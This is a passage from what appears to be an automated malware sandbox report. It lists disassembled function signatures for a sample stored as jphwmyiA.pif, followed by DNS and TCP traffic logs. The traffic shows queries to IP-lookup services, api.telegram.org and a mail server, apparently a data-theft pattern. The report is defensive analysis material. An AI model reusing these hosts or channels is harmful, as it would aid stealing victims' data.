                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B6A88h10_2_250B6790
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B3076h10_2_250B2DA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BEBA0h10_2_250BE8A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BC098h10_2_250BBDA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B1086h10_2_250B0DB8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BA8B0h10_2_250BA5B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B7DA8h10_2_250B7AB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B3996h10_2_250B36C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B65C0h10_2_250B62C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BD3B8h10_2_250BD0C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B19A6h10_2_250B16D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BBBD0h10_2_250BB8D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B0777h10_2_250B04D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B90C8h10_2_250B8DD0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B42B6h10_2_250B3FE8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B78E0h10_2_250B75E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BE6D8h10_2_250BE3E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B22C6h10_2_250B1FF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BCEF0h10_2_250BCBF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BA3E8h10_2_250BA0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250E0CC8h10_2_250E09D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, 000003E8h10_2_250EFDF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250E0800h10_2_250E0508
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, 000003E8h10_2_250EFDE0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250E0338h10_2_250E0040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_250FFDEE
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_250FFAC9
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_250FFAD8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_252531D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]10_2_2525EF70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]10_2_2525EF78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_252531C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then push 00000000h10_2_25B9E28E
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h15_2_1A40DC80
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]15_2_1EEBFD28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 1EEBF2B5h15_2_1EEBF0C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 1EEBFC3Fh15_2_1EEBF0C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 1EEBE0C5h15_2_1EEBDF07
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_1EEBEC1B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_1EEBEDFB
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]15_2_1EEBFD21
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_1EEBE5E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 1EEBE0C5h15_2_1EEBE114
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007185Dh15_2_20071440
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007C0D9h15_2_2007BE30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200710E9h15_2_20070E38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007DAE9h15_2_2007D840
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007DF41h15_2_2007DC98
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007E399h15_2_2007E0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007E7F1h15_2_2007E548
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007B829h15_2_2007B580
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007EC49h15_2_2007E9A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007BC81h15_2_2007B9D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007F0A1h15_2_2007EDF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007F4F9h15_2_2007F250
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007C531h15_2_2007C288
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007F951h15_2_2007F6A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007C989h15_2_2007C6E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007FDA9h15_2_2007FB00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007CDE1h15_2_2007CB38
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007185Dh15_2_2007178B
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007D239h15_2_2007CF90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2007D691h15_2_2007D3E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008A17Eh15_2_20089EB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20087DC0h15_2_20087AF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200868FDh15_2_200865C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008DCCEh15_2_2008DA00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200848C9h15_2_20084620
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008EF0Eh15_2_2008EC40
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200802E9h15_2_20080040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20081CF9h15_2_20081A50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008CF1Eh15_2_2008CC50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20083311h15_2_20083068
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008AF2Eh15_2_2008AC60
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20085709h15_2_20085460
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20084D21h15_2_20084A78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20080741h15_2_20080498
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008E15Eh15_2_2008DE90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20082151h15_2_20081EA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008C16Eh15_2_2008BEA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20085B61h15_2_200858B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20083769h15_2_200834C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008517Bh15_2_20084ED0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008F39Eh15_2_2008F0D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008D3AEh15_2_2008D0E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008B3BEh15_2_2008B0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20080B99h15_2_200808F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20083BC1h15_2_20083918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20085FB9h15_2_20085D10
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008E5EEh15_2_2008E320
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008C5FEh15_2_2008C330
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20080FF1h15_2_20080D48
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008A60Eh15_2_2008A340
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20086411h15_2_20086168
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008701Ah15_2_20086F69
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008F82Eh15_2_2008F560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008701Ah15_2_20086F70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20084019h15_2_20083D70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008D83Eh15_2_2008D570
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov esp, ebp15_2_20089B8A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008B84Eh15_2_2008B580
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20081449h15_2_200811A0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008EA7Eh15_2_2008E7B0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20084471h15_2_200841C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008CA8Eh15_2_2008C7C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008AA9Eh15_2_2008A7D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200818A1h15_2_200815F8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2008FCBEh15_2_2008F9F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F4C77h15_2_200F4908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FE210h15_2_200FDF18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F52A0h15_2_200F4FA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F22C6h15_2_200F1FF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F8C00h15_2_200F8908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F60F8h15_2_200F5E00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FF9F8h15_2_200FF700
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F2BE6h15_2_200F2918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FB708h15_2_200FB410
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F0BF6h15_2_200F0928
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F9F20h15_2_200F9C28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F7418h15_2_200F7120
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F3507h15_2_200F3238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F5C30h15_2_200F5938
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FF530h15_2_200FF238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FCA28h15_2_200FC730
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F1516h15_2_200F1248
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FB240h15_2_200FAF48
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F030Eh15_2_200F0040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F8738h15_2_200F8440
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F3E26h15_2_200F3B58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F6F50h15_2_200F6C58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FDD48h15_2_200FDA50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F1E36h15_2_200F1B68
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FC560h15_2_200FC268
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F9A58h15_2_200F9760
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F4746h15_2_200F4478
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F8270h15_2_200F7F78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F5768h15_2_200F5470
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FF069h15_2_200FED70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F2756h15_2_200F2488
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FD880h15_2_200FD588
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FAD78h15_2_200FAA80
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F9590h15_2_200F9298
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F6A88h15_2_200F6790
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F3076h15_2_200F2DA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FEBA0h15_2_200FE8A8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FC098h15_2_200FBDA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F1086h15_2_200F0DB8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FA8B0h15_2_200FA5B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F7DA8h15_2_200F7AB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F3996h15_2_200F36C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F65C0h15_2_200F62C8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FD3B8h15_2_200FD0C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F19A6h15_2_200F16D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FBBD0h15_2_200FB8D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F0777h15_2_200F04D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F90C8h15_2_200F8DD0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F42B6h15_2_200F3FE8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200F78E0h15_2_200F75E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FE6D8h15_2_200FE3E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FCEF0h15_2_200FCBF8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FA3E8h15_2_200FA0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20120CC8h15_2_201209D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, 000003E8h15_2_2012FDF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20120338h15_2_20120040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20120800h15_2_20120508
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, 000003E8h15_2_2012FDEF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_2013FAD8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_2013FAC9
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_2013FDEE
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_202931D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]15_2_2029EF78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]15_2_2029EF70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_202931C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then push 00000000h15_2_20BDE28E
                  Source: global traffic, DNS query: name: amazonenviro.com
                  Source: global traffic, DNS query: name: checkip.dyndns.org
                  Source: global traffic, DNS query: name: reallyfreegeoip.org
                  Source: global traffic, DNS query: name: api.telegram.org
                  Source: global traffic, DNS query: name: mail.techniqueqatar.com
                  Source: global trafficTCP traffic: 192.168.2.5:53671 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53681 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53683 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53681 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53694 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53681 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53709 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53711 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53723 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53724 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53738 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53750 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53759 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53771 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53782 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53677 -> 188.114.97.3:443
